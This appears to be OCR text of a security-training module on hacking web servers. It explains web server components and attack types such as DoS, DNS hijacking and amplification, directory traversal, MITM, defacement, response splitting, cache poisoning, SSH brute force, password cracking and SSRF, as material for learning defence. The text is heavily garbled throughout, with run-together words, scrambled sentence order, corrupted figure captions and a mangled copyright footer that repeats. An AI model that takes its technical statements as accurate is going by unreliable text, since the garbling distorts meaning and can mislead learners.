Mackin ©by E-Comel
Copyright
 WebServerOperations
(©
Awebserver
isa system
that
computer anddelivers
stores, processes, webpages
to cents
via
HTTP

Components
of aWebServer

Web Server Operations

A webserver is a computer systemthat stores,processes,and deliversweb pagesto global
TransferProtocol(HTTP).
clientsvia the Hypertext In general,
a clientinitiates a communication

processthrough HTTP requests.Whena clientdesires to access any resource suchas web

pages, photos, and videos,
the client'sbrowsergeneratesan HTTP requestthat is sent to the
web server. Depending
on the request,the web server collectsthe requested
information/content or application
fromthe datastorage servers and responds to the client's
HTTP response.If a web server cannot find the requested
with an appropriate
request
information,
then it generates
an error message.

‘Application
DataStore

Application

Webclient

Figure
13.1:Typical
client-server
communication in webserver
operation

ical andCountermensores
Mackin ©by E-Comel
Copyright
Components of a WebServer
server consistsof the following
‘Aweb components:
=
DocumentRoot
Thedocumentroot is one of the root file directories of the web server that stores
criticalHTMLfilesrelatedto the web pagesof a domainname, whichwill be sent i n
responseto requests.
Forexample, if therequested URLis www. certifiedhacker.com
andthedocument
root is
/admin/web,
andis storedi n the directory
named“certroot― then/admin/web/certroot
is the document directory
address.
If the complete requestis www.certifiedhacker.com/P-folio/index.html,
the server will
/admin/web/certroot/?-folio/index.
searchfor the file path html.
Server Root
It is the top-level root directory under the directory tree i n whichthe server's
configurationand error, executable,andlogfilesare stored.It consistsof the codethat
implements the server. The server root,i n general,
consistsof fourfiles.Onefile is
dedicated to the code that implements the server, while the other three are
subdirectories,namely, -conf,-logs,
and -cgi-bin, which are usedfor configuration
information,logs,andexecutables, respectively.
VirtualDocumentTree
provides
A virtual documenttree storageon a different machineor disk after the
diskbecomes
original object-level
full. It is case-sensitiveand can be usedto provide
security,
In the above exampleunder document root, for a request of
www.certifiedhacker.com/P-folio/index.html,
the server can alsosearchfor the file path
folio/index.html
/admin/web/certroot/P if the directory admin/web/certroot is storedi n

another
disk.
Virtual Hosting
hosting
multiple
It is a technique
of domainsor websiteson the same server. This
allows of among
sharingresources
technique the
scalecompanies, i n various
servers.
employed It is in large-
which company resources are intended to be accessedand
managed
globally.
Thefollowing
are the typesof virtualhosting:

hosting
Name-based
© hosting
Internet Protocol(IP)-based
©.
hosting
Port-based

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
WebProxy
A proxy server is locatedbetweenthe web client and web server. Owing to the
placement of web proxies, all requestsfrom clientsare passed
on to the web server
throughthe web proxies.They are usedto preventIP blocking
andmaintain anonymity.
Open-sourceWebServerArchitecture
Open-sourceweb server architecturetypically Apache,
uses Linux, MySQL,and PHP,often
calledtheLAMPsoftware bundle,as the principal
components,
The following
are the functionsof the principal components web server
i n open-source
architecture:
=
Linuxis the operating
system of the webserver andprovides
(OS) a secure platform
=
Apache of the web server that handleseachHTTPrequestand
is the component
response
is a relational
MySQL usedto store thecontent andconfiguration
database information
of the webserver

layer
technology
PHPis the application dynamic
usedto generate web content

‘Site
Users siteAdmin tacks

aaSUw
ae 7

ANAT

Aplications

13.2:Functionsof the principal

Figure
ls WebServerArchitecture
oftheopen-source
components web
server
architecture

TheInternet InformationService(IIS)is @web server application

developed byMicrosoft for
Windows.IIS for WindowsServeris a flexible, secure, and easy-to-manage web server for
hostinganything on the web. It supportsHTTP,HTTPSecure(HTTPS), File TransferProtocol
(FTP),
FTPSecure(FTPS), Simple Mail TransferProtocol(SMTP),and NetworkNews Transfer
Protocol(NNTP)

ical andCountermensores
Mackin ©by E-Comel
Copyright
It hasseveralcomponents, includinga protocol listenersuchas HTTP.sys
and services suchas
the World WideWeb Publishing Service (WWW Service)
and WindowsProcessActivation
Service(WAS). Eachcomponent functions i n application
andwebserver roles.Thesefunctions
may includelistening managingprocesses,andreading
to requests, configuration
files.

rT?
protocol
stack
(ores)

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerSecurity
Issues
“©:
Atackers

canbe
wal errors
using
targetsoftware
usualy

security
such
|G. NetworkandOSlve attacks
vunerabiliesa ndconfiguration t o compromisewebservers

be
defended propernetwork measures arewal
10S,
ete, However,
webservers ean accessedfromanyurnerei a theInterne, which
renders
ther highly

web
party BUA| of
Custom Appleton:

Components
‘id Server
I
Attacks Lotcrows

SpenSoure/commarssl
Impactof Web
9 compromise
werscouts

Web
Server Website © dtecement

ts/0s Austins fhe

damage company

Web Server Security

Issues
A web server is a hardware/software applicationthat hostswebsitesand makesthem
accessible o ver the Internet. A web server, along with a browser, successfully
implements
client-server modelarchitecture. In thismodel,thewebserver plays theroleoftheserver, and
the browseractsas the client.Tohostwebsites, a web server stores theweb pagesof websites
anddeliversa particular webpageuponrequest. Eachweb server hasa domain name andan IP
addressassociated with that domainname. A web server can hostmore thanone website,Any
computer can act as a web server if it hasspecificserver software(aweb server program)
Installedandis connectedto the Internet.
Webservers
are chosenbasedon their capability
to handleserver-side
programming, security
publishing,
characteristics, searchengines,andsite-building
tools.Apache,Microsoft IIS,Nginx,
Google,
andTomcatare some of the most widely
usedweb server software.An attackerusually
targetsvulnerabilities
i n thesoftware and configuration
component web
errors to compromise
servers

Internet
Browser
o n Users
Computer
Website?

gure
13.4
Conceptual ofa webserver: the user visits websiteshosted
dlagram

ical
ona web

andCountermensores
Mackin
server

©by E-Comel
Copyright
Organizations can defendmost network-level and OS-level attacks by adopting network
securitymeasures such as firewalls, intrusion detection systems(IDSs), and intrusion
preventionsystems(IPSs) and by following securitystandardsand guidelines. Thisforces
attackersto turn their attention to web-server-and web-application-levelattacksbecausea
web server that hostsweb applications fromanywhere
is accessible over the Internet.This
makesweb servers an attractive target. Poorlyconfigured web servers can create
i n even the most carefully
vulnerabilities designedfirewallsystems.Attackerscan exploitpoorly
configured web servers with known vulnerabilitiesto compromisethe securityof web
applications.
organization,
Furthermore,
servers
web
Asshownin belowfigure,
with known vulnerabilities
organizational
security
can harmthe security of an
includesseven levelsfromstack
to 7
1 stack

CustomWebApplicationsmB. sua? ® Logic

Business Flaws

Third-party
Components ©} OpenSource/Commercial
WebServer 5 L. —
Apache/Mmicrosoft
IIS

Database
System
Operating
BSOracle/Mysalymis
@®
Sat
Windows/tinux/os
x

a a
sss
135:Levels
Figure of organizational
security
CommonGoalsbehindWebServerHacking
Attackersperform web server attackswith certain goalsi n mind,Thesegoals maybe either
technicalor non-technical. For example, attackersmaybreachthe securityof a web server and
stealsensitive informationfor financialgainsor merely
for thesakeof curiosity
Thefollowing
are somecommon goals
ofwebserver attacks:

Stealing
details
sensitive
Integrating
credentials
credit-card
perform
phishing
techniques
(DoS)
or other
the server into a botnetto
using
denialof service or distributedDoS

(DDoS)
attacks
Compromisinga database
closed-source
Obtaining applications
Hiding redirecting
and traffic
+
Escalating
privileges
Someattacks
a re performed
for personal
reasons,ratherthanfinancialgains
For pure curiosity

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
a self-set
Forcompleting challenge
intellectual
For

Dangerous
Security
the
FlawsAffecting
targetreputation
damaging organization’s
WebServerSecurity
A web server configured bypoorly trained systemadministrators may have security
vulnerabilities.Inadequate knowledge, negligence,laziness, and inattentiveness toward
securitycan posethe greatestthreatsto webserver security.
following
‘The are some common oversights that makea web server vulnerableto attacks:
=
Failing
to updatethewebserver withthe latestpatches
‘=

=
the
Using same
Allowing
credentials
system administrator everywhere
unrestrictedinternalandoutboundtraffic
=

of Web
Impact
Running
Server
Attacks
and
servers
applications
unhardened

Attackerscan cause various kindsof damage byattacking

to an organization a web server. The
following
are someofthe typesofdamage thatattackers can causeto a webserver.
=
Compromise of user accounts: Webserver attacksmostly focuson compromising user
accounts.Ifthe attackercompromises a user account,they can gaina largeamount of
usefulinformation.The attackercan use the compromised
user account to launch
furtherattacks
o n the webserver.
Websitedefacement:Attackerscan completely
replacing
its original
displaying
data.They
change
defacethe targetwebsitebychanging
differentpageswith messagesof their own.
of websiteby
the appearance
the visualsand a
Secondary
attacksfrom the website:An attackerwho compromises
@web server can
use the server to launchfurtherattackson various websitesor clientsystems.
Rootaccessto other applications or server: Rootaccessis the highest
privilegelevelto
login to a server, irrespective
of whetherthe server is a dedicated,semi-dedicated, or
virtual privateserver. Attackerscan perform anyaction once theyattain root accessto
the server.
Data tampering: An attackercan alter or deletethe data of a web server and even
replacethedatawith malware to compromise u serswho connect to thewebserver.
Datatheft: Data among the primary assetsof an organization.
are Attackerscan attain
accessto sensitive datasuchas financialrecords,futureplans,or the source codeof a
program.
Damage reputationof the company:Web server attacksmayexposethe personal
informationof a company'scustomersto the public,
damagingthe reputation
of the
company.Consequently,
customers losefaith in the companyand become
afraidof
sharing
their personal
detailswith the company.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Whyare WebServersCompromised?

Whyare Web Servers Compromised?

Thereare inherent risksassociated
security (LANs)
with web servers, thelocalarea networks
that hostwebsites,
andtheend users who access thesewebsitesusing browsers.
Webmaster'sperspective: From a webmaster'sperspective, the greatest security
concern is that a webserver can exposethe LANor corporate intranet to threatsposed
bythe Internet. Thesethreatsmay be i n the formof viruses, Trojans, attackers, or the
compromise of data. Bugs i n software programsa re oftensources of security lapses.
Webservers, whichare large and complexdevices, alsohavetheseinherentrisks.In
addition, the open architectureof webservers allowsarbitrary scriptsto run on the
server sidewhileresponding AnyCommonGateway
to remote requests. Interface(CGl)
scriptinstalledi n the webserver maycontain bugs thatare potential security holes.
Network administrator'sperspective: Froma network administrator's perspective, a
poorlyconfigured web server causes potential holesi n the LAN’s security.Whilethe
objectiveof the web server is to provide controlledaccess to the network,excess
controlcan makethe web almostimpossible to use. In a n intranet environment,the
networkadministratormust configure the web server carefully so that legitimate users
are recognizedand authenticated, and groups of users are assigned distinct access
privileges.
Enduser'sperspective: the end user doesnot perceiveany immediatethreat,
Usually,
becausesurfing the web appears both safeand anonymous. However, active content,
suchas ActiveXcontrolsandJavaapplets, makeit possible forharmfulapplications,
suchas viruses, to invadethe user'ssystem. In addition,
active content from a website
that is displayed bytheuser’s
browser can be usedas a conduit formalicioussoftware
to bypass the firewallsystemandpermeate the LAN.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing thatcan compromise
are some oversights a webserver:
=
Improperfile anddirectory
permissions

Unnecessary
thewith
Installing server
‘=

default and
services
enabled,
settings
includingcontent management
remote
administration
Security conflictswith thebusiness’
ease-of-userequirements
Lackof propersecuritypolicy, procedures,andmaintenance
Improper authenticationwith externalsystems
Defaultaccountswith defaultor no passwords
Unnecessary default, backup,
or samplefiles
Misconfigurations i n the webserver, OS,
andnetworks
Bugsi n server software, OS,andweb applications
Misconfigured SecureSockets Layer certificates
(SSL) andencryption
settings
or debugging
‘Administrative functionsthatare enabledor accessible
on web servers

of
Use self-signed
certificatesanddefaultcertificates

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

e e e
WebServer WebServer WebServer
Concepts itacks ttack
‘Methodology

e °e
Counter:
Patch
e
measures
WebServer

Management Security
Tools

Web ServerAttacks
attackercan use manytechniques
‘An to compromise a web server, suchas DoS/DDoS, Domain
NameSystem (ONS) DNSamplification,
server hijacking, directory man in the middle
traversal,
(MITM)/sniffing,phishing,websitedefacement,web server misconfiguration,HTTPresponse
web cachepoisoning,SecureShell(SSH)
splitting, bruteforce,andweb server password
cracking.
Thissectiondescribes theseattacktechniquesi n detail

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DoS/DDoSAttacks
Attackers

to
t numerous
hefake
maysend
i t unavallble legimate
to thewebserver, which
requests
users,
causes webserver rashingor makes

‘owned may weba credit

Attackers targethigh

steal
services to card
payment
and
profile servers
user credentials
such banks, gateways, government

DoS/DDoSAttacks
A.D0S/DDoS attackinvolvesfloodingtargetswithcopiousfakerequests so that the targetstops
functioning and becomesunavailableto legitimate users. Byusing a web server DoS/DDoS
attack,an attackerattempts to takethewebserver downor makeit unavailable to legitimate
users. A web server DoS/DDoS attackoften targetshigh-profileweb servers suchas bank
servers, credit-card
payment gateways,andeven root name servers.

To crasha web server runningan application,the attackertargetsthe following

services to
consume the webserver'sresources withfakerequests:
Network
bandwidth =
CPUusage
Server

memory
Application handling.
exception
=

=
Hard-disk
Database
space
space
mechanism

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSServer Hijacking

1© theONSserver andchanges

Attackerc ompromises so thatathe requestscoming,
theONSsettings
towardsthetargetw eb
server malicious
are redirected
to his/her
own server

“e
=
=a

oe
DNS Server Hijacking
The Domain Name System (DNS) a domainname to its corresponding
resolves IP address.A
User queriesthe DNSserver with a domainname, and the DNSserver respondswith the
corresponding
IP
address.
In DNSserver hijacking, a DNSserver andchanges
an attackercompromises its mapping
settingsto redirecttowarda rogueDNSserver that wouldredirectthe user’s to the
requests
attacker'srogueserver. Consequently, whentheuser entersa legitimate the
URLi n a browser,
will redirectto theattacker'sfakesite.
settings

necchet
| cs oes
oremes
‘themalious wetite

ormserver
checks
ns the OMS
respective

“jacane― .
ONSServer(Target) Users(Viti) Legitimete
site
Figure
13.7;
jacking
NS server

ical andCountermensores
Mackin ©by E-Comel
Copyright
 DNSAmplification
Attack
(©Attacker
takesadvantage
ofthe DNS
recursive method
of
DNS redirectionto performONS attacks
amplification

.*

DNSAmplification
Attack (Cont'd)
(2 tctr wer compromisedPs wth pooted
Padeses to amplytheODS atc
onVin ON server

iT as |
DNS Amplification
Attack
Recursive DNSquery is a methodof requesting ONSmapping.Thequerygoesthrough DNS
servers recursively
until it failsto findthe specified
domainname to IPaddressmapping,

Module3 1608
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
The following are the stepsinvolvedin processing thesestepsare
recursive DNSrequests;
illustratedi n thebelowfigure.
=
Step1:
Userswhodesireto resolve a domainname to its corresponding
IP address
senda ONS
query to the primary DNS
properties. server
specified ControlProtocol(TCP)/IP
i n its Transmission

Steps 2to 7:
If the requested
DNSmappingdoes not exist on the user'sprimaryDNSserver,the
server forwardsthe request
to the root server. Theroot server forwardsthe request
to
the .com namespace, where the user can find DNSmappings.Thisprocessrepeats
recursively
Step
8:
until
theDNSmappingis resolved.

when the systemfinds the primary DNSserver for the requested

Ultimately, DNS
mapping,it
generates
a
address DNS
primary server.
cachefor the IP in the user's

o6
13.8:Recursive
Figure DNSquery

Attackersexploitrecursive DNSqueriesto perform

a DNSamplification
attackthat resultsin
DDoSattackso n thevictim’s
DNSserver.
Thefollowing
are the steps
involvedi n a DNSamplification
attack;
these stepsare illustratedi n
thebelowfigure.
=
Step1:
Theattackerinstructs compromised
hosts(bots)
to makeDNSqueriesi n the network,

Step 2:
All the compromisedhostsspoof
thevictim’s IPaddressandsendDNSqueryrequests
to
the primaryDNSserver configured
i n the victim'sTCP/IP
settings.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Steps 3 to 8:
If the requestedDNSmappingdoesnot exist on the victim'sprimaryDNSserver,the
server forwardsthe requests
to the root server. Theroot server forwardsthe requestto
the .com or respective top-leveldomain (TLO) namespaces. This processrepeats
recursively
until the victim'sprimaryDNSserver resolves
the DNSmappingrequest.
Step
9:
Afterthe primaryDNSserver findsthe ONSmappingfor the victim’s it sendsa
request,
DNS mappingresponse to the victim'sIP address.This response goesto the victim
becausebotsuse thevictim’s
IPaddress. Therepliesto copiousDNSmappingrequests

on DNS
fromthe botsresulti n DDoS the victim’sserver.

13.9:D NS
Figure amplifeation
attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TraversalAttacks
Directory
©
Indirectory
traversal
attacks,
attackers
./ sequence
directory access
restricted
theweb server root
‘Outside
“eAstacers
can use the tril anderror
usethe (dotdot slash)
methodto navigate
outside
theroot
to

andacces
directory
directories
sensitive
information
inthesystem

pte
fen
pi fermccom/ert
Peds!
Systomiziemdont/e
‘areek

TraversalAttacks
Directory
attackermay be ableto perform
‘An a directory
traversalattackowing to a vulnerability
i n the
codeof a web application.
In addition,poorlypatched or configured
webserver software c an
maketheweb server vulnerableto a directory
traversalattack,
The design of web servers limits publicaccess to some extent. Directory traversalis the
exploitation of HTTPthrough which attackers c an access restricteddirectoriesand execute
commands outsidethe webserver'sroot directory bymanipulating a UniformResource Locator
(URL). In directory attackersuse the dot-dot-slash(.,/)sequenceto access
traversalattacks,
restricteddirectoriesoutsidethe web server'sroot directory. Attackerscan use the trial-and-
error methodto navigate outsidethe root directory andaccesssensitive information i n the
system.
attackerexploits
‘An the web server software(webserver program)
to perform
directory
traversalattacks.Theattackerusually performsthisattackwiththe helpof a browser.A web
server is vulnerableto this attackif it accepts
inputdata from a browserwithout proper
validation.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 neoerver come
phase. [Window
Srstema2jemd.em?/c
sire

Figure
traversal
13.10Dectory attack

Module3 2612
Page tical andCountermensores
Making by Comet
Copyright©
 Attack
Man-in-the-Middle/Sniffing
D
A)

4
Nennthesi wan attaches to aces
Conmunistionsbetweenan endseerandwe servers
nation by Interception
altering

®woawacie
pro
tat the
wer
ad
wses. sueh al communication
between

Attack
Man-in-the-Middle/Sniffing
Man-in-the-middle(MITM) attacksallow an attacker to access sensitive information by
intercepting and alteringcommunicationsbetweenan enduser andwebservers. In an MITM
attackor sniffingattack, an intruderintercepts or modifiesthe messages exchanged between
the user and web server byeavesdropping or intruding into a connection.Thisallowsan
attackerto steal sensitive user Information,suchas online banking details,usernames, and
passwords, transferredover the Internet to the web server. Theattackerluresthe victim to
connect to the web server bypretending to be a proxy.If the victim believesand acceptsthe
attacker'srequest, then all the communication betweenthe user and web server passes
through theattacker.In this manner,theattackercan stealsensitive user information.

‘iacker
13.11:
Figure Maninthe-midale/snifing
attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacks
Phishing

eo»
<p este
ating
°

Attacks
Phishing
perform
‘Attackers a phishing attackbysending an emailcontaining a maliciouslinkandtricking
the user into clicking
it. Clicking
the linkwill redirectthe user to a fakewebsitethat appears
similarto the legitimate website,Attackerscreate suchwebsitesbyhosting their addresso n
servers. When a victim clickson the malicious
‘web link while believingthe link to be a
legitimate websiteaddress, the victim is redirectedto the maliciouswebsitehostedon the
attacker'sserver. The website promptsthe user to enter sensitive information, such as
usernames, passwords, bank account details,and socialsecurity numbers, and divulges the
datato the attacker.Later,the attackermaybe ableto establisha session with the legitimate
websitebyusingthe victim'sstolencredentialsto perform maliciousoperations on the target
legitimate website.
©

victim WebServerHosting
Target
Lepitimate
ry
Webste

‘iin reap ama

Figure
é
arracker

23.12Phishing
attacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebsiteDefacement

Webdefacement
intruder accuts
when an

byinsertingor substituting
proves,
eect ed
data
offending
You are OWNEDI!II!

‘ormiseading
HACKED!
unl theunauthorized

and
information
changesare discovered Hi Master,Yourwebsiteis
corrected byUS,Hackers!
‘owned
‘attackers
use
a
varietyof methods
"Nexttarget microsoft.com
~

{site in
to
order deface
it

WebsiteDefacement
Websitedefacementrefersto unauthorizedchanges madeto the content of a singleweb page
or an entire website, i n changes
resulting
Hackersbreakinto web servers andalter the hostedwebsitebyinjecting
popups,or text to a pagei n sucha manner that thevisualappearance
of
to the visualappearance thewebpageor website.
codeto add images,
of the pagechanges. In
some cases, theattackermayreplace
of
the entire websiteinstead just changing a single
page.

HACKED!
HiMaster,
Your
‘owned website
is
byUS,Hackers!
Next target microsoft.com
-

13.12:
Figure Screenshot
awebsite
displaying

ical
defacement
attack

andCountermensores ©
Mackin by E-Comel
Copyright
Defaced pagesexposevisitors to propaganda or misleading
informationuntilthe unauthorized
changes are discovered and corrected,Attackersuse a varietyof methods,suchas MySQL
to accessa websiteto deface
injection, to changing
i t. In addition thevisualappearance ofthe
targetwebsite,attackersdefacewebsitesfor infecting the computers of visitors bymaking
the
websitevulnerable to virus attacks.Thus, websitedefacement not onlyembarrasses thetarget
organizationbychanging
of
the appearance its websitebut is alsointendedto harmits visitors.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerMisconfiguration
|G.Servermiconfiguration
fers weaknesses
to configuration inwe
that
infastructre canbeexploited
t launch

WebServer

erore Dabuaror
Misconfiguration
Messe [a
Web
Server
Misconfiguration
son
Thecestgunion
Examples
erent
epdconth e
onan apache
server

‘

ho in fle

WebServerMisconfiguration
Webserver misconfiguration refersto the configurationweaknesses i n webinfrastructure
that
can beexploited to launchvarious attacks o n webservers, suchas directorytraversal,
server
intrusion,anddatatheft.Thefollowing are some web server misconfigurations:
+
Verbosedebug/error
messages
+

+
or
default
Anonymous users/passwords
configuration
Sample andseriptfiles
+
Remoteadministration
functions
+

+
Unnecessary
enabled
Misconfigured/default
services

SSLcertificates

Example
‘An
Server
of a Web Misconfiguration
“Keeping configuration
the server secure requiresvigilance―—Open
WebApplication
Security
Project
(OWASP)
Administrators who configure
web servers improperly may leaveserious loopholes i n the web
server, therebyprovidingan attackerthe chanceto exploit the misconfigured web server to
compromise and obtain sensitive information.Thevulnerabilitiesof improperly
its security
configured web servers may be relatedto configuration, applications, files,scripts,or web
pages.An attacker searchesfor such vulnerableweb servers to launch attacks.The
misconfigurationofa webserver provides the attackera path to enter thetargetnetworkof an
organization, These loopholes i n the server can also helpan attacker bypass user

ical andCountermensores
Mackin ©by E-Comel
Copyright
authentication. theseproblems
Oncedetected, exploited
can be easily and mayresultin the
a
total compromiseof websitehostedon the target
As showni n the belowfigure,
web server.
the configuration
mayallow anyoneto view the server status
page,whichcontains detailedinformationaboutthe current use of the web server, including
being
informationaboutthe current hostsandrequests processed

Asshowni n
gute
thebelow
13.14:
the on
Screenshot

figure, configuration
the
an
displaying httpd.conf
le Apache server

maygiveverboseerror messages.

display_error =
on

log_errors =
On

error_log =
syslog

12.15;
Figure Screenshotdsplayng
the php.ini

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HTTPResponse-Splitting
Attack

into the
responsedata = theinputfl so that server splts
Input son

User
T h e attacker

fre
toa
can
malclous
discarded
MOY
contoltheft response
website
to redirect
the
whereasthe otherresponses
bythewebbrowser
Sectors

(AUTHOR_PARM)
equeat.getPeranater

setaanaze
(cookiazsptration)
fsothor)
Ssokie

HTTP Response-Splitting
Attack
HTTPresponse-splitting
‘An attackis a web-based attacki n whichthe attackertricksthe server
byinjectingnew linesinto responseheaders, along with arbitrary code.It involvesadding
headerresponse data into the inputfield so that the server splitsthe responseinto two
responses. Thistypeof attackexploits vulnerabilities
i n inputvalidation. Cross-site scripting
(XS5), cross-site requestforgery (CSRF), and StructuredQuery Language (SQL) injectionare
examples of this typeof attack.In this attack, the attackercontrolsthe inputparameterand
cleverly constructsa request headerthat elicitstwo responses from the server. Theattacker
altersa singlerequest to appear as two requests byadding headerresponse datainto the input
field.Thewebserver, in turn, responds to eachrequest. Theattackercan passmaliciousdatato
a vulnerableapplication, andthe application
attackercan controlthe firstresponse
includes in an
the
data
to redirectthe user to a maliciousHTTP
response
website,
header.The
whereasthe
web
browser
will discardother responses.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 on
eenat
~

ened

cookie
aetitaxhge
(cookieExpiration)

Figure
13.16:HTTP
Response attack
Splitting
Example
of
In this example,
Response-Splitting
a n HTTP Attack
the attackersendsa response-splitting requestto the web server. Theserver
splitsthe responseinto two and sendsthe first responseto the attackerand the second
responseto the victim. After receivingthe responsefromthe web server, the victim requests
byproviding
service credentials.Simultaneously, the attackerrequests
for the indexpage.
Subsequently, requestto the attacker,
the web server sendsthe response to the victim’s and
the victim remains uninformed.

Victim,

coe 13.17;Example
Figure ofanHTTPresponse-spliting
attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebCachePoisoning
Attack

© {were

WebCachePoisoning
Attack
Webcachepoisoning damages the reliability
of an intermediateweb cachesource. In this
attack,an attackerswapscached
webcachesource mayunknowingly
content whenrequesting
a
content for random
use the poisoned
therequired URLthrough
URLwithinfected content.Usersofthe
content insteadof the true andsecured
theweb cache.
An attacker
forces thewebserver's cache to flushits actualcachecontent andsendsa specially
craftedrequest to store i n the cache.In this case,all the users of that web server cachewill
receive maliciouscontent untilthe servers flushthe webcache.Webcache poisoningattacks
are possible
if theweb server andapplication haveHTTPresponse-splitting flaws.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 forcesthe
web servers cacheto
flushts actualcache
contentands ends8
crafted
Specially
request,whichwillbe
stored in cache
— —

Figure
cache
13.18:Web poisoningattack

Module3 1622
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
 SSHBruteForceAttack
58Hprotocols
are used to createan SSH
encrypted tunnelbetweentwo host to transfer
unenerypted

‘aches

‘8H
tunnelscan beusedtotransmit malwaresan
to
credentials gon unauthorized
can brutefree SSHlogin

otheexploits
ovis
access to an SSHtunnel

withoutbeing
detected

E>

SSHBruteForceAttack
Attackersuse SSHprotocols to create an encryptedSSHtunnelbetweentwo hoststo transfer
unencrypted dataover an insecure network.Usually, SSHruns on TCPport22. To perform an

attackon SSH,

obtainslogin
an attackerscansthe entire SSHserver usingbots(performs
port22)to identify possible
credentialsto gainunauthorized
Withthe help
vulnerabilities.
a portscan on TCP
of a brute-forceattack,
the attacker
a ccessto an SSHtunnel.Anattackerwhoobtains
the login credentialsof SSHcan use the same SSHtunnelsto transmit malwareand other
meansof exploitation to victims without being detected.Attackersuse toolssuchas Nmap and
Neracko n a Linuxplatform to perform an SSHbrute-forceattack.

Intemet —SSHServer WebServer

13.19:
Figure SSHBruteForce
attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerPasswordCracking
‘a
tres
Anattacer
to
empl
to
hack
passwords
wennests wellchosen

Rttackermainty | sens (©

Web
ormcracking
authentkaton

can
be by
Passwords crackedmanuallyguesingor byperforin dictionary,
rte force,
andhybrid tack sing avtomated

WebServerPasswordCracking
Analttackerattemptsto exploit
weaknesses passwords.
to hackwell-chosen Themost common
passwords found are password, root, administrator,
admin,demo,test,guest,qwerty,pet
names,and so on. Theattackermainly targetsthe following
through
web server password
cracking:
SMTPandFTPservers

Web shares
SSHtunnels
Webformauthentication
Attackersuse differentmethodssuchas socialengineering,spoofing, phishing,a Trojanhorse
andkeystroke
or virus, wiretapping, loggingto perform
web server password cracking.
In many
hracki
ng attempts,
a
theyare validuser.
the attackerstarts with passwordcracking
to proveto the web that
server
Cracking
WebServerPassword Techniques
Password cracking is the most common methodof gainingunauthorized
access to a web server
byexploiting flawedandweakauthentication Oncethe password
mechanisms. is cracked, an
attadkercan use the password to launchfurtherattacks.
We present some detailsof various toolsandtechniques usedbyattackersto crackpasswords.
can use password
‘Attackers cracking techniquesto extract passwords
from web servers, FTP
servers, SMTPservers, andso on. They can crackpasswords either manually
or with automated
toolssuchas THCHydra, Nerack, andRainbowCrack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing attackersuse to crack
are some techniques passwords:
=
Guessing: Thisis the most common methodof cracking passwords.In thismethod,the
attackerguessespossible passwordseither manually or by usingautomatedtools
provided with dictionaries.Most people tend to use their pets’
names, loved ones’
names, licenseplatenumbers, dates of birth,or other weak passwords suchas
“QWERTY,― “admin,―
“password,― etc. so that theycan rememberthem easily. The
attackerexploitsthishumanbehaviorto crackpasswords.
Dictionary
attack:A dictionary
attack uses a predefined
file containing
various
combinations of words,andan automatedprogram
checkif any of them are the password,
includesspecialcharactersandsymbols.
entersone
at
thesewords a time to
Thismightnot be effectiveif the password
If the password is a simpleword,thenit can be
found quickly. Compared to a brute-forceattack, a dictionary attack is lesstime
consuming,
Brute-forceattack:In the brute-forcemethod, all possible charactercombinations a re
tested;for example,the test mayinclude combinations of uppercase characters fromA
to Z,numbersfrom0 to 9,andlowercase characters froma to z. Thismethodis useful
for identifying
one-wordor two-wordpasswords. If a password consists of uppercase
and lowercaselettersas well as special characters, it might take monthsor yearsto
crackthe password usinga brute-forceattack.
Hybrid
attack:A hybrid
attackis more powerful
thantheabovetechniques
because
it
uses both a dictionary
attackandbrute-forceattack.It alsouses symbols
andnumbers.
cracking
Password is easier
with thismethodthan with theabovemethods.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Server-SideRequest
Forgery Attack
(SSRF)
(2 acters expoSRFvlnrabtes na
pubic
web
server
send
to
requests
othe
intemal
servers
crated aback end

Server-Side Request Forgery (SSRF) Attack

Attackersexploitserver-siderequestforgery (SSRF)
vulnerabilities,
whichevolve from the
unsafe i n an application,
u se offunctions i n public
webservers to sendcraftedrequests the
internalor backendservers. Internalservers are usually
the network from unwanted trafficinflows.Therefore,
implemented to
byfirewallsto prevent
attackersleverageSSRF vulnerabilities
in
Internet-facing
web servers to gain access to the backendservers that are protected
bya
is madebythe web server because
firewall.Thebackendserver believesthat the request they
are on the same networkandresponds withthe datastoredinit.
Generally,
server-side a re initiated to obtaininformationfrom an externalresource
requests
andfeed it into an application.
For instance,a designer can utilize a URL suchas
hnttps://xyz.com/feed,php?urlzexternalsite.com/feed/to
to obtain a remote feed. If attackers
can
alter
is to
This howSSRF
then they
the URLinput the localhost,
vulnerabilitiesevolve.
can view allthe localresources on the server.

Oncethe attackis successfully

performed, attackerscan perform
various activities suchas port
networkscanning,
scanning, IP address discovery,reading ofwebserver files,bypassingofhost
basedauthentication,
interaction withcriticalprotocols,
andremote codeexecution

ical andCountermensores
Mackin ©by E-Comel
Copyright
artacker
Firewall
13.20:
Figure Demonstration
ofSRFattack
D atabase
Server

une
 WebApplication
Attacks

weba the
web
servers
(©Wonerabitesnwebappliations
runningon
a stackpath
serverarovde broad forcompromising

Parameter/Form
Tampering cookie
T ampering inputa ndF l ijection
‘Unvalidated
Paes

Injection
attacks
SesionMipeing SQL Dietaryravers

Service
Deni
SeriptingOverfow
oss
ste tacks
(O08)
atack (SS)tacks Butler

Cros ite Request (SRE)

Forgery

WebApplication
Attacks
Evenif web servers are configured
securelyor are securedusingnetworksecurity m easures
suchas firewalls,a poorly
codedweb application deployedon the web server mayprovide a

pathforan attackerto compromise If webdevelopers

the webserver'ssecurity. do not adopt
secure coding while developing
practices web applications,attackersmaybe able to exploit
